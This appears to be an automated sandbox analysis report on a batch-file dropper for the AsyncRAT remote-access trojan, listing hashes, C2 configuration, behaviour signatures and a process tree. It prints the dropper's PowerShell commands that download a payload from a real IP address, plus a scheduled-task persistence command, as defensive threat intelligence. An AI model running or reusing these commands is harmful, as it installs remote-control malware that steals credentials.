Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2024 02:15

General

  • Target

    Sat.bat

  • Size

    2KB

  • MD5

    0e2fff554ddadc58aaff7978ec06aa32

  • SHA1

    b453b17905235ea96150c90711285f7879d3afc0

  • SHA256

    64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

  • SHA512

    c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://109.199.101.109:770/xx.jpg

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Default

C2

samsalah1.freeddns.org:1005

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 53 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4540
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3388
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:3680
        • C:\Users\Admin\Documents\AutoHotkey64.exe
          "C:\Users\Admin\Documents\AutoHotkey64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
              PID:1800
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2004
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2364
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2712
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              5⤵
                PID:4620
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1504
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4964
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4464
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2960
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                  PID:1568
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4028
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                    PID:224
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2008
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4192
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1860
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4736
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1712
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2892
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:380
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3360
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1560
                • C:\Users\Admin\Documents\AutoHotkey64.exe
                  "C:\Users\Admin\Documents\AutoHotkey64.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:4304
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4080
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3200
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:60
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3180
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                      PID:2580
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4036
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:2900
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4896
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3328
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4448
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:2164
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      5⤵
                        PID:3436
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        5⤵
                          PID:1664
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4512
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4844
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4404
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4312
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4676
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:3420
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4092
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          5⤵
                            PID:2664
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:3048
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:5016
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:3908
                        • C:\Users\Admin\Documents\AutoHotkey64.exe
                          "C:\Users\Admin\Documents\AutoHotkey64.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          • Suspicious use of WriteProcessMemory
                          PID:4764
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            5⤵
                              PID:184
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2736
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1744
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3120
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:2976
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1728
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3532
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3408
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                                PID:1216
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:212
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                5⤵
                                  PID:372
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:324
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4296
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                  5⤵
                                    PID:1856
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3656
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2792
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                    5⤵
                                      PID:4668
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:748
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3776
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      5⤵
                                        PID:1440
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2652
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3324
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /Query /TN "alosh"
                                      4⤵
                                        PID:4692
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -Command "$tr = New-Object -ComObject Schedule.Service; " "$tr.Connect(); " "$ta = $tr.NewTask(0); " "$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; " "$ta.Settings.Enabled = $true; " "$ta.Settings.DisallowStartIfOnBatteries = $false; " "$st = $ta.Triggers.Create(1); " "$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); " "$st.Repetition.Interval = 'PT2M'; " "$md = $ta.Actions.Create(0); " "$md.Path = 'C:\Users\Admin\\Documents\\AutoHotkey64.exe'; " "$ns = $tr.GetFolder('\'); " "$ns.RegisterTaskDefinition('alosh', $ta, 6, $null, $null, 3);"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1304
                                • C:\Users\Admin\Documents\AutoHotkey64.exe
                                  C:\Users\Admin\\Documents\\AutoHotkey64.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:2184

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  6cf293cb4d80be23433eecf74ddb5503

                                  SHA1

                                  24fe4752df102c2ef492954d6b046cb5512ad408

                                  SHA256

                                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                  SHA512

                                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                  Filesize

                                  425B

                                  MD5

                                  4eaca4566b22b01cd3bc115b9b0b2196

                                  SHA1

                                  e743e0792c19f71740416e7b3c061d9f1336bf94

                                  SHA256

                                  34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                                  SHA512

                                  bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  d8b9a260789a22d72263ef3bb119108c

                                  SHA1

                                  376a9bd48726f422679f2cd65003442c0b6f6dd5

                                  SHA256

                                  d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                                  SHA512

                                  550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  1dffbab5ecc6d06e8b259ad505a0dc2a

                                  SHA1

                                  0938ec61e4af55d7ee9d12708fdc55c72ccb090c

                                  SHA256

                                  a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

                                  SHA512

                                  93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  b6dfd36e6091ed6aba59eb32c086c283

                                  SHA1

                                  27fdf360f2224366a6be59cf12a9d6f4f95a71fa

                                  SHA256

                                  5027d744204e1ed39b42ac1d73e40c28c80ab8f2b5f3042957de621bb8b543f7

                                  SHA512

                                  5bd347bfd1b6320ec2520032af51904cab2295f12fe660d7fec036750805050720710d524a3d96e4e452fa9d5b402b0bf543feb1a0f4ba7b9d3fe6d46ad22b7d

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzcivrno.kva.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\Documents\A.txt

                                  Filesize

                                  270KB

                                  MD5

                                  fcb797ad5f0600fabe1f0f32ea35063a

                                  SHA1

                                  c869826b399026e6a394f260f697f7daae4b30f6

                                  SHA256

                                  dd354350e31dd582e3060e1d9e7fc89d5eee5d6af36178095ade798b5f7715ad

                                  SHA512

                                  e5750c59aead966926ace3a71b66fa1710930c9e2ac0a08766be63302f8d09ffaf0a4549de016d1297ba52066409814518a83d68e818f26fb94fb0c5551c4623

                                • C:\Users\Admin\Documents\AutoHotkey64.ahk

                                  Filesize

                                  6KB

                                  MD5

                                  65bd377a23adf5d7d3f8d902d3fcead2

                                  SHA1

                                  570381a1edc203245fa6ff087efaed510a52e16d

                                  SHA256

                                  6bd2a145c7017b2ee3434f4893f497999d2bd11818a56794a4b6df04c0cc6120

                                  SHA512

                                  63de2c32dc2ac8098796fba837c3ccd93ad91af293e3add8cde56e5a2d70426d83a2b88ffcc3d2c02d3a895c2f1e3502bae405db0047f0267549075a0187c236

                                • C:\Users\Admin\Documents\AutoHotkey64.exe

                                  Filesize

                                  1.2MB

                                  MD5

                                  e92a3d6ca4bde49c6f0e1e343fdae44e

                                  SHA1

                                  02c27d2e076a19f54b133bb9c57b457b242d4116

                                  SHA256

                                  16109cec66cf252e5b851739bc9f7639a1802a0c3998b3829950e52911ca6599

                                  SHA512

                                  19df941ca771a23756936c0ee08fd5a9218784f2712c5735245aeacb532e46215654e4ddf83fbdd4b4d6a1aac3fb2a95119d883f4b3229cc7a4c690b197e24e7

                                • C:\Users\Admin\Documents\x.zip

                                  Filesize

                                  648KB

                                  MD5

                                  134af0f2fc2a9cd8976a242b81f8840f

                                  SHA1

                                  8a7acfbe935abd112af0b4eb77dc87ba595f64a5

                                  SHA256

                                  0268871620a416498e385020574721680eae7a9d887eb995fc6d3fef61d568d8

                                  SHA512

                                  b711acabe2dd8223accb1571f2c68d099f0977d350df4cf74b969e9b4a6fe1a563ff91cf8f81105ab3e6a94d973f6bded067e22b81192dc04ceff4212057169c

                                • memory/2736-85-0x0000000006140000-0x00000000061DC000-memory.dmp

                                  Filesize

                                  624KB

                                • memory/2736-87-0x0000000006250000-0x00000000062B6000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/2736-86-0x0000000006790000-0x0000000006D34000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/3388-43-0x0000019CB8050000-0x0000019CB8062000-memory.dmp

                                  Filesize

                                  72KB

                                • memory/3388-44-0x0000019CB8030000-0x0000019CB803A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/4080-71-0x0000000000400000-0x0000000000416000-memory.dmp

                                  Filesize

                                  88KB

                                • memory/4540-27-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4540-32-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4540-17-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4540-29-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4864-15-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4864-12-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4864-1-0x0000017FA3050000-0x0000017FA3072000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/4864-0-0x00007FFD0AF03000-0x00007FFD0AF05000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/4864-11-0x00007FFD0AF00000-0x00007FFD0B9C1000-memory.dmp

                                  Filesize

                                  10.8MB